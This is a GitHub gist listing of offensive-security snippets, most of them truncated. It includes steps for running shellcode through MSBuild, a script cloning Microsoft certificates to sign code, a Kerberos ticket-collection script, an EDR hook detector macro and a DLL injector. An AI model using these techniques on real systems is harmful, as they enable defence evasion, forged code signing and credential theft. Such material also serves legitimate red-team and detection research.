1. Open PowerShell
2. Set MSbuild GodMode Env Variable
$env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1
3. Execute C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe msbuild.png.xml
Note: This "Serves" Shellcode in a memory mapped file.
This is no accessible to other processes.
Change in line 62 in shellcode.cs . Manual offsets just to troll you. :)
I leave this for you to explore
InvokeThreatGuy invokethreatguy
invokethreatguy
/ syscalls.txt
Created
December 19, 2020 21:26
— forked from nikolay-n/syscalls.txt
macOS syscall
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| syscall = 0 | |
| exit = 1 | |
| fork = 2 | |
| read = 3 | |
| write = 4 | |
| open = 5 | |
| close = 6 | |
| wait4 = 7 | |
| link = 9 | |
| unlink = 10 |
invokethreatguy
/ CertificateCloning.ps1
Created
December 19, 2020 20:00
— forked from mattifestation/CertificateCloning.ps1
The steps required to clone a legitimate certificate chain and sign code with it.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # We'll just store the cloned certificates in current user "Personal" store for now. | |
| $CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' } | |
| $MS_Root_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Root.cer | |
| $Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation | |
| $MS_PCA_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32PCA.cer | |
| $Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation | |
| $MS_Leaf_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Leaf.cer |
invokethreatguy
/ _Steps.md
Created
December 19, 2020 19:59
Capbility Diffusion 101 - MsBuild Sets - Shellcode.exe spikes - Shellcode Horcrux if you like that analogy.
invokethreatguy
/ Get-KerberosTicketGrantingTicket.ps1
Created
December 18, 2020 16:23
— forked from jaredcatkinson/Get-KerberosTicketGrantingTicket.ps1
Kerberos Ticket Granting Ticket Collection Script and Golden Ticket Detection Tests
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-KerberosTicketGrantingTicket | |
| { | |
| <# | |
| .SYNOPSIS | |
| Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
| .DESCRIPTION | |
| Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
invokethreatguy
/ hookdetector.vba
Created
December 17, 2020 14:36
— forked from X-C3LL/hookdetector.vba
VBA Macro to detect EDR Hooks (It's just a PoC)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
| Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
| Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
| 'VBA Macro that detects hooks made by EDRs | |
| 'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
| Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
| Dim address As LongPtr |
invokethreatguy
/ DllInjector.cs
Created
December 11, 2020 06:06
— forked from HunteX/DllInjector.cs
Clean class in C# used for DLL injection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Linq; | |
| using System.Text; | |
| using System.Runtime.InteropServices; | |
| namespace DllInjector | |
| { | |
| public static class DllInjector | |
| { |
invokethreatguy
/ gist:5fa79de2dff636c7c380983514e3bae3
Created
December 10, 2020 03:59
Get PEB64 without using P/Invoke
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Reflection; | |
| using System.Runtime.CompilerServices; | |
| using System.Text; | |
| namespace ConsoleApp1 | |
| { | |
| unsafe class Program | |
| { | |
| static void Main(string[] args) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| static class Program | |
| { | |
| [DllImport("kernel32.dll", SetLastError = true)] | |
| public static extern IntPtr LoadLibrary(string dllToLoad); | |
| [DllImport("kernel32.dll")] | |
| public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName); | |
| static void Main() | |
| { |
invokethreatguy
/ x86_relative_shellcode_strings.c
Created
November 26, 2020 18:37
— forked from CCob/x86_relative_shellcode_strings.c
x86 Relative String Addressing Hack
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x83\xc0\x05\xc3" str; | |
| #define REF_STRING(var) ((char*(*)())var)() | |
| DECLARE_STRING(data1, "Hello, World!\n"); | |
| DECLARE_STRING(data2, "Goodbye, World!\n"); | |
| int main(int , char** ) |
invokethreatguy
/ dashboard-5c5ee7780849a005a92cb1a6.json
Created
November 26, 2020 18:09
— forked from NickCraver/dashboard-5c5ee7780849a005a92cb1a6.json
UniFi Dashboard - Overview
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| gi{"name":"Overview","desc":"System Overview","controller_version":"5.10.12","modules":[{"id":"default:mega|status","module_id":"mega|status","restrictions":{"removable":false,"draggable":false},"config":{}},{"module_id":"internet-connection","config":{},"id":"dd5f7461-f8f0-4017-859c-3d9271b673bf"},{"module_id":"summary|wifi","config":{},"id":"13a78652-ad84-4fcb-943a-86929c638353"},{"module_id":"clients|freq-distribution","config":{"palette":"BLUE_GRADIENT_10"},"id":"c9626f4f-021f-4d46-b22d-86007570bac7"},{"module_id":"clients|top5|active","config":{"trafficType":"total"},"id":"36a9e071-132e-4b4a-baee-250449a6d44f"},{"module_id":"devices|uap|top5|channel-util","config":{"trafficType":"total"},"id":"9803f077-b9cd-4db0-b466-60d92fae2020"},{"module_id":"devices|uap|top5|active","config":{"trafficType":"total"},"id":"e6133049-cc56-44b3-a4c2-b0843912dac5"},{"module_id":"devices|uap|top5|client-count","config":{},"id":"d39f9c80-1827-4ba0-b573-3209789c56b5"},{"module_id":"summary|switching","config":{},"id":"5966437 |